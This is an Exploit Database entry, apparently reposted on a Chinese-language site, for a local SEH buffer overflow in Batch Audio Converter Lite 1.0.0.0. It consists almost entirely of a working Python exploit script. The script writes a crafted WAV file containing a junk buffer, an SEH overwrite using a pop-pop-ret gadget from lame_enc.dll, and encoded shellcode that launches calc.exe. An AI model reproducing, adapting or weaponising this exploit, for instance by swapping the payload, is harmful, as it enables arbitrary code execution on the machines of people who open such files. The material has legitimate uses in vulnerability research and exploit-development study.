Batch Audio Converter Lite Edition 1.0.0.0 – Local Stack Buffer Overflow (SEH)

• Exploit Database
• 14 阅读

• 作者： modpr0be
  日期： 2010-06-17
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/13909/

• # Software Link:
  http://www.freesoftwaretoolbox.com/files/batchaudio_setup.exe
  # Tested on: Windows XP SP2
  # Type of Vuln: SEH
  # Code : bacon-exploit.py
  # Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus
  lainnya ^^
  # Thanks: All OffSec member
  
  #!/usr/bin/python
  
  import struct
  
  junk = "A" * 4132
  nseh = "\xeb\x06\x90\x90"
  seh = struct.pack('<L', 0x10029bb7) # pop edi pop esi ret from
  lame_enc.dll
  nop = "\x90" * 30
  print "[+] Preparing for file.."
  # windows/exec, CMD=calc.exe, EXITFUNC=seh
  # 463 bytes, x86/alpha_mixed
  shellcode = ("\x89\xe3\xdb\xc6\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
  "\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
  "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
  "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
  "\x6c\x49\x78\x4d\x59\x47\x70\x45\x50\x45\x50\x43\x50\x4c\x49"
  "\x48\x65\x45\x61\x4e\x32\x42\x44\x4e\x6b\x50\x52\x44\x70\x4c"
  "\x4b\x50\x52\x44\x4c\x4e\x6b\x42\x72\x45\x44\x4c\x4b\x43\x42"
  "\x46\x48\x44\x4f\x4d\x67\x51\x5a\x46\x46\x44\x71\x4b\x4f\x44"
  "\x71\x49\x50\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x43\x32\x46\x4c"
  "\x51\x30\x49\x51\x48\x4f\x46\x6d\x45\x51\x49\x57\x4d\x32\x48"
  "\x70\x50\x52\x42\x77\x4c\x4b\x46\x32\x44\x50\x4c\x4b\x43\x72"
  "\x47\x4c\x47\x71\x4e\x30\x4c\x4b\x47\x30\x51\x68\x4f\x75\x4f"
  "\x30\x42\x54\x42\x6a\x46\x61\x4a\x70\x46\x30\x4c\x4b\x43\x78"
  "\x46\x78\x4e\x6b\x43\x68\x47\x50\x45\x51\x4b\x63\x4b\x53\x47"
  "\x4c\x47\x39\x4e\x6b\x47\x44\x4e\x6b\x46\x61\x48\x56\x50\x31"
  "\x49\x6f\x50\x31\x4f\x30\x4c\x6c\x4b\x71\x4a\x6f\x44\x4d\x46"
  "\x61\x48\x47\x46\x58\x4d\x30\x44\x35\x49\x64\x43\x33\x43\x4d"
  "\x48\x78\x47\x4b\x51\x6d\x47\x54\x51\x65\x4b\x52\x43\x68\x4e"
  "\x6b\x46\x38\x47\x54\x47\x71\x4e\x33\x43\x56\x4e\x6b\x46\x6c"
  "\x50\x4b\x4c\x4b\x50\x58\x45\x4c\x46\x61\x4b\x63\x4e\x6b\x47"
  "\x74\x4c\x4b\x43\x31\x4a\x70\x4c\x49\x42\x64\x44\x64\x46\x44"
  "\x51\x4b\x51\x4b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b\x4f\x4b"
  "\x50\x46\x38\x51\x4f\x50\x5a\x4e\x6b\x45\x42\x48\x6b\x4c\x46"
  "\x51\x4d\x51\x7a\x46\x61\x4c\x4d\x4f\x75\x4f\x49\x47\x70\x43"
  "\x30\x43\x30\x46\x30\x42\x48\x50\x31\x4e\x6b\x50\x6f\x4d\x57"
  "\x49\x6f\x4b\x65\x4f\x4b\x4b\x4e\x46\x6e\x50\x32\x49\x7a\x43"
  "\x58\x4c\x66\x4f\x65\x4f\x4d\x4f\x6d\x4b\x4f\x48\x55\x47\x4c"
  "\x47\x76\x51\x6c\x45\x5a\x4d\x50\x4b\x4b\x4d\x30\x44\x35\x43"
  "\x35\x4d\x6b\x47\x37\x45\x43\x42\x52\x50\x6f\x51\x7a\x45\x50"
  "\x51\x43\x49\x6f\x4b\x65\x43\x53\x45\x31\x42\x4c\x43\x53\x46"
  "\x4e\x45\x35\x51\x68\x42\x45\x43\x30\x45\x5a\x41\x41")
  
  f = open('exploit.wav', 'w')
  print "[+] Writing vulnerable WAV file.."
  f.write(junk+nseh+seh+nop+shellcode)
  f.close()
  print "[+] Success writing file.."